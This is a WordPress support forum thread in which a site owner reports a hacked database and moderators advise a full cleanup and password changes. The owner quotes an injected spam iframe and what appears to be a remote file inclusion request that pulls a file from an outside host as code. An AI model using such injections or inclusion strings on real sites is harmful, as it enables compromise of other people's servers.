Forums

WordPress › Support » How-To and Troubleshooting

[resolved] Database hacked; full of iframes and ads (7 posts)

  1. ohdiesel
    Member
    Posted 2 years ago #

    Hello,

    I ran a scan of my database and it is full of garbage like iframes and other "hacks."

    Does anyone have any idea of how to clean it without messing up the database?

    I checked the database by hand and it is full of advertisements and whatnot.

    Here are some of the things I found:

    g.
    <span id="more-1286"></span>
    `<iframe src="http://www.testimonialvictory.com/messages/step1.aspx?cid=176d5707-f551-4a53-9466-21524841a881" width="575" height="700" styl</p>
    <p>/8JBZTUfo/wordpress-restaurer-une-base-de-donnees-mysql_std.original.jpg" alt="Restaurer une base de données MySQL" />

    Does anyone have any idea how this could have happened?

  2. Ipstenu
    Half-Elf Support Rogue & Mod
    Posted 2 years ago #

    A few. There's more than one way to hack a site, though, and spculation on that won't help.

    Let's fix ya!

    Read these:
    http://codex.wordpress.org/FAQ_My_site_was_hacked
    http://ocaoimh.ie/did-your-wordpress-site-get-hacked/

  3. ohdiesel
    Member
    Posted 2 years ago #

    Hello,

    Thanks a lot.

    I think I will just try to restore a backup I made some time back and try to keep permissions strict.

    There is nothing I can do in the meantime to fix the database problem?

    I think it is just a database problem as I have scanned files and found nothing, but I could definitely have missed something.

  4. Rev. Voodoo
    Volunteer Moderator
    Posted 2 years ago #

    if you restore the database without following those steps, it could be a waste of time.

    did you check every single file and folder on your server?
    did you change every single password? (ftp, login, database)

    I dealt with it a bit back, and every time I thought I had everything cleaned, I was wrong. It's not easy, but if you're not thorough, it's pointless.

  5. ohdiesel
    Member
    Posted 2 years ago #

    Hello,

    I have not checked it all thoroughly.

    I did run into something else:

    /skin/zero_vote/ask_password.php?dir=http://pushkinhouse.readershp.com/zeroboard/data/2_qna1/test.txt??

    Anybody know where/what that crap is?

    Thanks

  6. Rev. Voodoo
    Volunteer Moderator
    Posted 2 years ago #

    yup, more crap...
    you've probable got rogue php files that were put on your server

    do you happen to have a /skin/zero_vote directory anywhere on your server?

  7. ohdiesel
    Member
    Posted 2 years ago #

    Hello,

    I am checking as we speak and will let you know.

    Thanks a lot for helping out.

    My website is the coming depression dot net

    Let me know if you see anything fishy in the code, please!

    OD

Topic Closed

This topic has been closed to new replies.

About this Topic

Tags